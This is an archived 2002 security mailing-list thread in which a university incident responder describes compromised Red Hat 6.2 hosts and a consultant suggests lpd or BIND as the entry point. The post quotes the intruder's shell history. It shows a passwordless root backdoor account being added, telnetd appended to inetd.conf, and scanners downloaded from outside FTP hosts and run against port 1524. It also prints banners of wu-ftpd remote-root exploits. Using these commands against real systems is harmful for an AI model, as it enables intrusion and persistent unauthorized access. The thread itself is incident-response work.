Security Incidents mailing list archives
Re: Compromised - Port 1524
From: "Jose Miguel Varet" <varet () esatt com>
Date: Wed, 6 Mar 2002 23:53:36 +0100
Eric,
please note that 'lpd' is running. Within rh6.2, that means a whole homerun
for a script kiddie.
Not to mention that, if named was running, again with rh6.2 that would mean
bind < 8.2.3P5, which in turn means serious troubles.
Those two come to my head at a first glance... I cannot tell for sure about
all the other stuff, since I'd have to take a look at some vuln database
first.
Both vulns have well-known and old exploits, very easy to find and use
against such a default installation. Have a look at /var/named , and look
for any strange directory you could see there. If you find something
strange, it's very likely you've been caught via the bind exploit. Keep in
mind that lpd also gives full root compromise anyway, thought.
Greets,
Jose Miguel Varet
Security Consultant
ISIS S.L.
----- Original Message -----
From: "Hines, Eric" <eric3 () exchange cis pitt edu>
To: <incidents () securityfocus com>
Cc: "'Tina Bird'" <tbird () precision-guesswork com>; "'Lance Spitzner'"
<lance () honeynet org>; "'Michael Clark'" <mike () honeynet org>
Sent: Wednesday, March 06, 2002 8:48 PM
Subject: Compromised - Port 1524
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Fellow Analysts: This morning several of our systems were compromised and am still working to find out what exploit was used. Please offer any advice you can. A utility was left behind along with a massive amount of systems in output log files that was created by this utility. I have provided all my information below. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= My notes - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= I went through the system and found the following things. The /tmp directory was the hackers home directory he was using. Turns out he deleted that .bash_history file and forgot to nail /root/.bash_history However, it is still unclear to me how he broke in. Notice that he did an "echo telnetd >>" over to inetd.conf and started up telnetd. Yeh, he could have run the telnetd b0f exploits against it but whats the point? He already had root access to the machine. I also checked the version of SSHD, I've checked its version against my 500 TARGETS for ./x2, ./x3 and ./x5 and doesn't seem to match anything. I checked to see if snmp was running (wasn't running). Does anyone know if Redhat 6.2 default install contained a vulnerable wu_ftpd? Unfortunately the machine was rebuilt before I could check the version of wu_ftpd. I went ahead and checked my exploits for it and wonder if anyone here had any default wuftpd installs of redhat 6.2 hit? If anyone has responded to a similar machine, please let me know! Eric [loki@tigerteam1 woot]$ ./forcer -t0 ./forcer magic ./forcer <type> <addr> 1) RH7.2 - 2.6.2(1) Wed Aug 9 05:54:50 EDT 2002 2) RH7.2 - wu-2.6.2(2) 3) Special wu-2.6.3(3) [loki@tigerteam1 new]$ ./wu-sploit -t0 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! num . description - ----+------------------------------------------------------- 1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm] 34 | Slackware 7.1 [root@tigerteam1 floppy]# telnet 192.168.0.1 22 Connected to 192.168.0.1 22 Escape character is '^]'. SSH-1.99-OpenSSH_3.0.2p1 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= System Info - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Redhat 6.2 (default install) SSHD RPC* - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= # ps -aux - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= root 1 0.0 0.1 1120 416 ? S Feb25 0:04 init root 2 0.0 0.0 0 0 ? SW Feb25 0:00 [keventd] root 3 0.0 0.0 0 0 ? SW Feb25 0:00 [kapm-idled] root 4 0.0 0.0 0 0 ? SWN Feb25 0:00 [ksoftirqd_CPU0] root 5 0.0 0.0 0 0 ? SW Feb25 0:10 [kswapd] root 6 0.0 0.0 0 0 ? SW Feb25 0:00 [kreclaimd] root 7 0.0 0.0 0 0 ? SW Feb25 0:00 [bdflush] root 8 0.0 0.0 0 0 ? SW Feb25 0:00 [kupdated] root 9 0.0 0.0 0 0 ? SW Feb25 0:00 [khubd] bin 348 0.0 0.1 1212 484 ? S Feb25 0:00 portmap rpcuser 368 0.0 0.2 1340 544 ? S Feb25 0:00 rpc.statd root 382 0.0 0.1 1104 400 ? S Feb25 0:00 /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r root 434 0.0 0.1 1208 444 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc root 436 0.0 0.1 1208 500 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /home file /etc/auto.home root 441 0.0 0.1 1208 444 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto root 483 0.0 0.3 6264 1016 ? S Feb25 0:00 /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek root 502 0.0 0.1 1172 500 ? S Feb25 0:06 syslogd -m 0 root 511 0.0 0.1 1944 436 ? S Feb25 0:10 klogd nobody 525 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o nobody 529 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o nobody 530 0.0 0.2 1312 600 ? S Feb25 0:03 identd - -e -o nobody 531 0.0 0.2 1312 600 ? S Feb25 0:03 identd - -e -o nobody 532 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o daemon 543 0.0 0.1 1144 464 ? S Feb25 0:00 /usr/sbin/atd root 557 0.0 0.2 1328 556 ? S Feb25 0:00 crond root 575 0.0 0.1 1156 496 ? S Feb25 0:00 inetd root 589 0.0 0.1 1204 440 ? S Feb25 0:00 lpd root 615 0.0 0.1 1192 316 ? S Feb25 0:00 rpc.rquotad root 645 0.0 0.1 1248 364 ? S Feb25 0:00 rpc.mountd root 654 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 655 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 656 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 657 0.0 0.0 0 0 ? SW Feb25 0:00 [lockd] root 658 0.0 0.0 0 0 ? SW Feb25 0:00 [rpciod] root 659 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 660 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 661 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 662 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 663 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] condor 696 0.0 0.4 2816 1080 ? S Feb25 1:12 /auto/condor/sbin/condor_master condor 704 0.0 0.6 3596 1576 ? S Feb25 0:56 condor_startd -f condor 715 0.0 0.4 3324 1060 ? S Feb25 0:00 condor_schedd -f root 741 0.0 0.3 2432 780 ? S Feb25 0:00 sendmail: accepting connections root 756 0.0 0.1 1156 408 ? S Feb25 0:00 gpm -t imps2 xfs 803 0.0 0.4 3404 1072 ? S Feb25 0:01 xfs - -droppriv -daemon -port -1 root 846 0.0 0.2 2092 672 ? S Feb25 0:29 sshd root 852 0.0 0.1 1092 336 tty1 S Feb25 0:00 /sbin/mingetty tty1 root 853 0.0 0.1 1092 336 tty2 S Feb25 0:00 /sbin/mingetty tty2 root 854 0.0 0.1 1092 336 tty3 S Feb25 0:00 /sbin/mingetty tty3 root 855 0.0 0.1 1092 336 tty4 S Feb25 0:00 /sbin/mingetty tty4 root 858 0.0 0.1 1092 336 tty5 S Feb25 0:00 /sbin/mingetty tty5 root 859 0.0 0.1 1092 336 tty6 S Feb25 0:00 /sbin/mingetty tty6 root 860 0.0 0.2 2744 620 ? S Feb25 0:00 /usr/bin/gdm -nodaemon root 865 2.8 2.5 48200 6564 ? S Feb25 358:24 /etc/X11/X -auth /var/gdm/:0.Xauth :0 root 866 0.0 0.3 3452 972 ? S Feb25 0:00 /usr/bin/gdm -nodaemon turnshek 19979 0.0 0.7 5640 1864 ? S Mar03 0:00 /usr/bin/gnome-session turnshek 20009 0.0 0.6 5436 1596 ? S Mar03 0:00 gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client- turnshek 20013 0.0 0.6 4376 1676 ? S Mar03 0:03 enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile turnshek 20019 0.9 0.7 5968 2036 ? S Mar03 32:05 magicdev --sm-client-id 11888e7113000098519292400000009670005 turnshek 20030 0.0 0.3 2636 804 ? S Mar03 0:00 gnome-name-service turnshek 20032 0.0 1.0 7072 2652 ? S Mar03 0:01 panel - --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188 turnshek 20034 0.0 0.6 3188 1648 ? S Mar03 0:05 xscreensaver -no-splash -timeout 20 -nice 10 turnshek 20036 0.0 0.9 7536 2404 ? S Mar03 0:00 gmc - --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851 turnshek 20042 0.0 0.9 6100 2388 ? S Mar03 0:09 gnomepager_applet --activate-goad-server gnomepager_applet turnshek 20044 0.0 0.9 6068 2308 ? S Mar03 0:00 gen_util_applet --activate-goad-server gen_util_applet turnshek 22000 0.1 2.0 56824 5168 ? S Mar04 4:55 /usr/lib/netscape/netscape-communicator -irix-session-management turnshek 22016 0.0 0.2 16660 664 ? S Mar04 0:00 (dns helper) turnshek 22046 0.0 0.8 5832 2096 ? S Mar04 0:08 gnome-terminal turnshek 22047 0.0 0.1 1144 440 ? S Mar04 0:00 gnome-pty-helper turnshek 22048 0.0 0.2 2424 600 pts/0 S Mar04 0:00 -csh turnshek 25361 0.0 0.8 5800 2100 ? S Mar05 0:00 gnome-terminal turnshek 25362 0.0 0.1 1144 440 ? S Mar05 0:00 gnome-pty-helper turnshek 25363 0.0 0.2 2424 600 pts/1 S Mar05 0:00 -csh root 7402 0.0 0.3 1704 928 ? S 03:49 0:00 bash - -i root 9237 0.0 0.1 1112 404 ? S 04:50 0:00 tail - -f 211.out root 9506 0.0 0.1 1104 396 ? S 05:07 0:00 tail - -f 211.out root 10302 0.0 0.1 1100 384 ? S 06:35 0:00 tail - -f 122.out root 11808 9.8 0.2 1416 692 ? RN 07:36 0:25 ./synscan 130 130.out eth0 30000 1524 root 11812 52.3 0.2 1412 692 ? RN 07:36 2:13 ./synscan 130 130.out eth0 30000 1524 root 11817 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11818 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11819 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11820 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11821 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11822 0.0 0.0 0 0 ? ZN 07:39 0:00 [synscan <defunct>] turnshek 11825 26.4 2.6 21660 6864 ? RN 07:39 0:16 sproingies -root root 11830 0.0 0.0 0 0 ? ZN 07:39 0:00 [synscan <defunct>] root 11834 0.6 0.6 2996 1580 ? S 07:40 0:00 sshd root 11835 0.0 0.3 1724 972 pts/2 S 07:40 0:00 -bash root 11859 0.0 0.3 2556 872 pts/2 R 07:40 0:00 ps - -augxw - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Contents of /etc/passwd - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= u:x:12347:12347::/tmp:/bin/bash r:x:0:12348::/tmp:/bin/bash - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Output generated by synscan1.6.tar (contains ip addresses of systems with Port 1524 (ingreslock) open, logging connections that produce a # prompt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= 122.out 128.out 130.out 218.out - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= .bash_history - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= uname -a; cat /proc/cpuifo; cat /proc/cpuinfo' '; cat /proc/cpuinfo; ping -c 5 www.yahoo.com; /usr/sbin/adduser -p "" u; tail /etc/passwd; /usr/sbin/adduser -p "" -d /tmp u; /usr/sbin/adduser -p "" -d /tmp -u 0 r; grep rsdh /etc/inetd.conf; grep rsh /etc/inetd.conf; grep shell /etc/inetd.conf; cat /etc/inetd.conf; ls -al /etc/inetd.conf; locate ...; /sbin/ifconfig -a; dmesg | grep -i promi; tail /etc/rc.d/rc.local; ps auwx| grep named; cat /etc/redhat-rel*; ps auwx| grep stat; exit; la -L /UAE/AVIN/IN.DRPS; ls -al /usr/sbin/in.ftpd; locate in.ftpd; tail /etc/passwd; echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf; ps auwx| grep inetd; kill -HUP 575; exit; cat /etc/hosts.deny; mv /etc/hosts.deny /etc/host.deny; exit; locate in.rlogin; ls -al /usr/sbin/in.*; locate telnet; ping -c 10 www.yahoo.com; wget; which lynx; ncftp cd /tmp; #cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf /root/.ncftp;chmod 755 t0rnscan; cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.172.226.26/../../tmp/synscan; ls -al; cat fuk.ps; chmod 755 synscan; nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; ls -al 216.out; ls -al 216.out; grep "#" 216.out; ls -al 216.out; grep "#" 216.out;exit; cd /tmp; grep "#" *.out; tail 216.out; tail 216.out; tail 216.out; grep access *.out; tail 216.out; grep "#" 216.out; tail 216.out; tail 216.out; tail 216.out; ps auwx| grep synscan; tail 216.out; tail 216.out; killall -9 synscan; egrep "access|#" *.out; rm -rf 216.out; killall -9 synscan; nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; ls -al 217.out; cat 217.out; cat 217.out; tail 217.out; grep "#" 217.out; tail 217.out; tail 217.out; tail 217.out; tail 217.out; grep "#" 217.out; tail 217.out; grep "#" 217.out | grep -v root; tail 217.out; tail 217.out; tail 217.out; tail 217.out; tail 217.out; grep "#" 217.out; tail 217.out; tai217.out; tail 217.out; grep "#" 217.out | grep -v root; rm -rf 217.out; nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null; ls -al 218.out; ls -al 218.out; ls -al 218.out; cat 218.out; exit; cd /tmp; ls; tail 218.out; grep "#" 218.out; tail *.out; killall -9 synscan; nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null 2>/dev/null&2>/dev/null; ls -al 24.out; ls -al 24.out; ls -al 24.out; ls -al 24.out; p[s auwwx| grep synscan; ps auwx| grep synscan; ls -al 24.out; ls -al 24.out; ls -al 24.out; ls -al 24.out; ping -c 5 www.yahoo.com; ping -c 5 www.yahoo.com; ls -al 24.out; killall -9 synscan; nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; tail -f 24.out&2 >/dev/null; ps auwx| grep tail; ls -al 24.out; / /sbin/ifconfig -a; locate tcp.log; last| head -5; tail /home/sandhya/.bash_history; ls -al ~sandhya; cat /home/sandhya/.history; cat ~sandhya/.history; w; ls -al 24.out; ================================================ Eric S. Hines Technical Lead Information Security Group Computer Security Incident Response Team (CSIRT) - ------------------------------------------------ University of Pittsburgh Cathedral of Learning #701 Pittsburgh PA, 15260 [ph] +1 412 624-6728 [mo] +1 412 334-2379 [em] eric3 () pitt edu [al] 4123342370 () msg myvzw com ================================================ -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBPIZyXz4GESb0uqLMEQInbgCggBloMYEHfCWVbgcNKRTsu06Z/FAAnjgq wg9hokf1qGcgcYLiBI8iq+rj =2dWC -----END PGP SIGNATURE----- --------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Compromised - Port 1524 Hines, Eric (Mar 06)
- Re: Compromised - Port 1524 Jose Miguel Varet (Mar 06)
- Re: Compromised - Port 1524 switched (Mar 06)
- <Possible follow-ups>
- Re: Compromised - Port 1524 blazin w (Mar 08)